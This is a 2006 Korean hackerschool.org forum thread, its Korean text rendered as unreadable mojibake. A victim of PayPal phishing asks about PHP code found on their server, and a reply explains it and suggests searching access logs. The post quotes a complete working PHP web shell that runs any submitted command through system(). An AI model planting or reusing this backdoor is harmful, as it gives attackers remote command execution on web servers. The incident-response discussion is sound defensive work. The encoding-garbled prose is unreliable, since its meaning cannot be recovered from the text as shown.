Å©·¡Å· ÇÇÇØ

 423, 13/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ¸Û¸Û
   http://hackerschool.org
   [re] php ÄÚµå Å©·¡Å·¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?desc=asc&no=217 [º¹»ç]


===============================================================================
>¿î¿µÇÏ°í ÀÖ´Â ¼­¹ö¿¡
><?if(count($_GET)) extract($_GET);if(count($_POST)) extract($_POST);if(count($_SERVER)) extract($_SERVER);echo "<form action=$PHP_SELF method=post>command : <input type=text name=cmd><input type=submit></form><hr>";if($cmd){$cmd = str_replace("\\", "", $cmd);echo "<pre>"; system($cmd); echo "</pre>";}?>
>
>À§ ÄÚµå¿Í ÇÔ²² paypal ÇǽÌÀ» ´çÇÏ¿´½À´Ï´Ù.
>À§ÀÇ ÄÚµåÀÇ ºÐ¼®À» ÇÊ¿ä·Î ÇÕ´Ï´Ù.
>±×·³ ¸¹Àº Á¶¾ð ºÎŹµå¸³´Ï´Ù.. °¨»çÇÕ´Ï´Ù..
===============================================================================

ÇØ´ç ¼Ò½º ÄÚµå´Â backdoorÀÇ ÀÏÁ¾À¸·Î¼­, °ø°ÝÀÚ°¡ Àü´ÞÇÑ ¹®ÀÚ¿­À»

À¥ ¼­¹ö ±ÇÇÑÀÇ ½© ¸í·ÉÀ¸·Î ½ÇÇàÇÏ´Â ¿ªÇÒÀ» ÇÕ´Ï´Ù.

À§ ¼Ò½º ÄÚµå Áß Çٽɸ¸ ³²±â¸é <? system($cmd); ?> °¡ µË´Ï´Ù.

$cmd º¯¼ö·Î Àü´ÞµÈ ¹®ÀÚ¿­À» system ÇÔ¼ö·Î ½ÇÇàÇÑ´Ü ¸»ÀÔ´Ï´Ù.

´ëÀÀ ¹æ¾ÈÀ¸·Î½á..

¸ÕÀú, À§ ¼Ò½º ÄÚµåÀÇ ÆÄÀϸíÀ» À¥ ¼­¹ö ·Î±×¿¡¼­ °Ë»öÇØ º¸½Ã±â ¹Ù¶ø´Ï´Ù.

¿¹·Î, ¾ÆÆÄÄ¡¶ó¸é grep xxx.php /var/log/httpd/access_log °°Àº ¹æ¹ýÀ¸·Î

°Ë»öÇÏ½Ã¸é µË´Ï´Ù.

±×·³ ÀÌ ¹éµµ¾î ÆÄÀÏÀ» ¿äûÇÑ ·Î±×°¡ ³ª¿Ã °ÍÀÔ´Ï´Ù. (¸¸¾à °ø°ÝÀÚ°¡ ROOT

±ÇÇѱîÁö ȹµæÇÏ¿© ·Î±×¸¦ Áö¿ö¹ö·È´Ù¸é ³ª¿ÀÁö ¾ÊÀ» ¼öµµ ÀÖ½À´Ï´Ù.)

·Î±×°¡ ³ª¿Ô´Ù¸é IP¿Í REFERER ºÎºÐÀ» º¸°í °ø°ÝÀÚÀÇ Á¤º¸¸¦ ¾òÀ» ¼ö ÀÖÀ¸¸ç,

ÃÖÃÊ xxx.php°¡ ·Î±×¿¡ ³²Àº ½Ã°£À» ±âÁ¡À¸·Î ÁÖº¯ ·Î±×¸¦ ºÐ¼®ÇØ º¸½Ã¸é

°ø°ÝÀÚ°¡ ¾î¶² ¹æ¹ýÀ» ÀÌ¿ëÇؼ­ ¼­¹ö¿¡ ħÅõÇß´ÂÁö ãÀ» ¼ö ÀÖÀ» °ÍÀÔ´Ï´Ù. (À¥ÇØÅ·À¸·Î ħÅõÇß´Ù°í °¡Á¤)

ÀÌ Á¤º¸¸¦ ±â¹ÝÀ¸·Î Ãë¾àÁ¡ ÆÐÄ¡¿Í °ø°ÝÀÚ¿¡ ´ëÇÑ ¹ýÀû ´ëÀÀÀ» ÇϽñ⠹ٶø´Ï´Ù.

  Hit : 4171     Date : 2006/06/01 07:05



    
soarrr À½ ±×·¸±º¿ä Á¶¾ð Á¤¸» °¨»çµå¸³´Ï´Ù.. 2006/06/01  
183     [re] À©µµ¿ì À¥¼­¹ö ÆÄÀÏ º¯°æ(ÇØÅ·)¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..     ¸Û¸Û
09/27 6715
182   Áú¹®...[3]     È÷ÅÍƲ¾î
08/11 3781
181   Ŭ¶óÀ̾ðÆ® ºÐ¼®..[2]     sejin4951
08/10 4086
180   ÇØÅ·Åø,ÇØÅ·°ø°ÝÇüŸ¦ percent ·Î º¸¿©Áص¥°¡ ÀÖ³ª¿ä?[2]     segenny
08/08 4091
179   Ãʺ¸ÀÚ°¡ ÀÐÀ»¸¸ÇÏ°íÀÐÀ»¼öÀÖ´ÂÃ¥ ÃßõÁ»ÇØÁÖ¼¼¿ä[2]     lasword
08/04 4246
178   radmin Áú¹®ÀÌ¿ä[2]     cjw13246
08/01 4400
177   Å©·¡Å· ÇÇÇØ ¸¦ ´çÇß½À´Ï´Ù ![6]     zzangon7
07/29 3860
176   rootkit¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù..     soarrr
07/04 3850
175     [re] rootkit¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù..[2]     pr0sp3r
07/07 3873
174   ¸®´ª½º Å©·¡Å· Á¶¾ð ºÎŹµå¸³´Ï´Ù..     soarrr
06/26 4124
173     [re] ¸®´ª½º Å©·¡Å· Á¶¾ð ºÎŹµå¸³´Ï´Ù..[14]     ¸Û¸Û
06/28 4631
172       [re] [re] ¸®´ª½º Å©·¡Å· Á¶¾ð ºÎŹµå¸³´Ï´Ù..[22]     ¸Û¸Û
06/28 10166
171   ÄÄÇ»ÅÍ°¡ ÀÌ»óÇØ¿ä ±ÞÇØ¿ä![3]     skspc2
06/10 3760
170     [re] ÄÄÇ»ÅÍ°¡ ÀÌ»óÇØ¿ä ±ÞÇØ¿ä![1]     ¸Û¸Û
06/10 4059
169   php ÄÚµå Å©·¡Å·¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..     soarrr
06/01 3890
    [re] php ÄÚµå Å©·¡Å·¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..[1]     ¸Û¸Û
06/01 4170
167   ³Ý¸¶ºí¾ÆÀ̵ð¸¦ÇØÅ·´çÇؼ­±×·±µ¥¿ä..[3]     ¤¾¤ÀÄ¿½ºÄð
05/24 4259
166   ±ÞÁú¹®ÀÌ¿ä~¾Æ¹«·¡µµ ºí·Î±×ÇØÅ·´çÇÑ°Í °°Àºµ¥¿ä..[10]     sunsunsun
04/07 4313
165   windows 2000 server ÇØÅ· ..... ´çÇß½À´Ï´Ù. ÇØ°áÃ¥Á»[6]     adueosy
03/20 4524
164   3¿ù 9ÀÏ 10½Ã 42ºÐ ÇöÀç..[1]     kwoncraft
03/09 4044
[1]..[11][12] 13 [14][15][16][17][18][19][20]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org